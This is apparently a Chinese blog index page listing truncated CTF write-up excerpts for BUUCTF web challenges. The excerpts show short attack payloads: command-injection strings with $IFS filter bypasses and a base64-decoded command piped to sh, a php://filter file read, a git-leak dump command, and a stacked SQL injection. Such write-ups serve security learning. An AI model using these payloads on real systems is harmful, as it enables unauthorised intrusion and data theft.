hacking the future

ZJCTF2019

[ZJCTF 2019]NiZhuanSiWei12345678910111213141516171819<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file...

2024-08-15

buu

CTF

Liu ✌最帅

转换域名的Liu✌天外来助

2024-08-14

talk

小站

网鼎杯2020青龙组

[网鼎杯 2020 青龙组]AreUSerialz一个反序列化 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081<?phpincl...

2024-08-13

buu

CTF

HCTF2018

[HCTF 2018]WarmUp查看源码/source.php 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950<?php highlight_file(__FILE__); class emmm { publ...

2024-08-12

buu

CTF

MRCTF2020

[MRCTF2020]Ezpop123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354Welcome to index.php<?php//flag is in flag.php//WTF IS THIS?//Learn From https:...

2024-08-12

buu

CTF

BJDCTF2020

[BJDCTF2020]Mark loves cat进去之后是一个网页,怀疑是git泄露,因为挺多这样拿源码的而且题目是个cat 1python GitHack.py http://a2ea6e9a-3c74-4806-be7c-911267a2c810.node5.buuoj.cn:81/.git flag.php是一个普通的开文件的没啥用,源码如下 123456789101112131...

2024-08-11

buu

CTF

GXYCTF2019

[GXYCTF2019]Ping Ping Ping一个RCE 12345?ip=127.0.0.1;ls?ip=127.0.0.1;nl$IFS$1`ls`?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh [GXYCTF2019]禁止套娃扫描后台,状...

2024-08-11

buu

CTF

RoarCTF2019

[RoarCTF 2019]Easy Calc查看源码 123456789101112131415161718<script> $('#calc').submit(function(){ $.ajax({ ...

2024-08-11

buu

CTF

ACTF2020新生赛

[ACTF2020 新生赛]Exec一个非常简单的命令执行 12;ls /;tac /f* [ACTF2020 新生赛]Include随便怎么打都通,vps远程包含,filter协议等等 1?file=php://filter/convert.base64-encode/resource=flag.php [ACTF2020 新生赛]BackupFile题目提示直接访问/index.ph...

2024-08-11

buu

CTF

SUCTF2019

[SUCTF 2019]EasySQL堆叠注入首先查表 11;show tables; 如何查flag呢,猜测后端语句为 1select $post['query']||flag from Flag 那么涉及特性 SQL_MOD：是MySQL支持的基本语法、校验规则其中PIPES_AS_CONCAT:会将||认为字符串的连接符，而不是或运算符，这时||符号就像con...

2024-08-11

buu

CTF